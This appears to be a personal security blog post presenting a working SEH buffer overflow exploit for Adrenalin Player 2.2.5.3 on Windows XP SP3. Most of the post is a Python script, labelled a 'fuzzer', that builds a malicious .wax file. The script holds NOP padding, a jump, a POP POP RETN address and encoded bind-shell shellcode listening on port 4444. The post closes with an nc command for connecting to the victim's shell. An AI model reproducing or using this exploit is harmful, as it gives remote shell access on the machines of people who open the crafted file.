Adrenalin player is one of the music player application which has a user interface like winamp. Adrenalin player support many file format, like mp3, mp4, asf, m3u, pls, wax, etc. Yesterday I tried to make an exploit this application.
This is the fuzzer :
# !/usr/bin/python
# Title: Adrenalin Player (SEH) Buffer Overflow
# software: Adrenalin Player
# version : 2.2.5.3
# Platform: Windows XP sp3
# Date: June 16th, 2013
# Author: onying (@onyiing)
# Blog : http://itsecuritynewbie.blogspot.com/
# Thanks to: Information Security Shinobi Camp | http://www.is2c-dojo.com
junk
=
"\x90"
*
2140
junk
+
=
"\xeb\x06\x90\x90"
#jmp short
junk
+
=
"\x13\xf3\x16\x10"
#POP POP RETN
junk
+
=
"\x90"
*
16
# NOP padding before shellcode
#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk
+
=
(
"\xbb\x25\xaa\xd2\xa3\x2b\xc9\xda\xd6\xd9\x74\x24\xf4\x5e\xb1\x51"
"\x31\x5e\x10\x83\xee\xfc\x03\x7b\xa6\x30\x56\x7f\xdc\x5f\xd4\x97"
"\xd8\x5f\x18\x98\x7b\x2b\x8b\x42\x58\xa0\x11\xb6\x2b\xca\x9c\xbe"
"\x2a\xdc\x14\x71\x35\xa9\x74\xad\x44\x46\xc3\x26\x72\x13\xd5\xd6"
"\x4a\xe3\x4f\x8a\x29\x23\x1b\xd5\xf0\x6e\xe9\xd8\x30\x85\x06\xe1"
"\xe0\x7e\xcf\x60\xec\xf4\x50\xae\xef\xe1\x09\x25\xe3\xbe\x5e\x66"
"\xe0\x41\x8a\x9b\x34\xc9\xc5\xf7\x60\xd1\xb4\xc4\x58\x32\x52\x41"
"\xd9\xf4\x10\x15\xd2\x7f\x56\x89\x47\xf4\xd7\xb9\xc9\x63\x56\xf7"
"\xfb\x9f\x36\xf8\xd2\x06\xe4\x60\xb3\xf5\x38\x04\x34\x89\x0e\x8b"
"\xee\x92\xbf\x5b\xc4\x80\xbc\xa0\x8a\xa5\xeb\x89\xa3\xbf\x72\xb4"
"\x59\x37\x79\xe3\xcb\x4a\x82\xdb\x64\x92\x75\x2e\xd9\x73\x79\x06"
"\x71\x2f\xd6\xf5\x25\x8c\x8b\xba\x9a\xed\xfc\x5a\x75\x03\xa1\xc4"
"\xd6\xaa\xb8\x9d\xb1\x08\x20\xed\x86\x06\xaa\xdb\x63\xb9\x05\xb6"
"\x8c\x69\xcd\x9c\xde\xa4\xe7\x8b\xdf\x6f\xa4\x66\xdf\x40\x23\x6d"
"\x56\xe7\xfd\x3a\x96\x31\xad\x90\x3c\xeb\xb1\xc8\x2e\x7b\xa9\x91"
"\x96\x05\x62\x9e\xc1\xa3\x73\xb0\x88\x21\xe8\x56\x3d\xd5\x9d\x1f"
"\x58\x73\x0e\x46\x8a\x48\x27\x9f\xa6\x14\xb1\xbd\x06\x55\x32\xeb"
"\x97\x17\x98\x15\x25\xb4\x71\x64\xd0\xfc\xde\xdd\x8e\x95\x52\xdf"
"\x62\x73\x6c\x6a\xc1\x83\x44\xcf\x9e\x29\x38\xbe\x71\xa4\xbb\x11"
"\x23\x6d\xed\x6e\x13\xe5\xa0\x49\x91\x38\xe9\x96\x4c\xae\xf1\x97"
"\x46\xd0\xde\xec\xfe\xd2\x5c\x36\x64\xd4\xb5\xe4\x9a\xfa\x52\x76"
"\xbd\x19\xd1\xd5\xc2\x08\xe9\x09"
)
junk
+
=
"\x90"
*
(
3000
-
len
(junk))
file
=
open
(
"adrenalin.wax"
,
"w"
)
file
.write(junk)
file
.close()
This fuzzer will make file adrenalin with wax file extention. When the application exploited, just connect with nc (IP target) 4444 (example : #nc 192.168.56.101 4444)
file download : adrenalin player
exploit-db : fuzzer
1337day.com : 1337day.com
No comments:
Post a Comment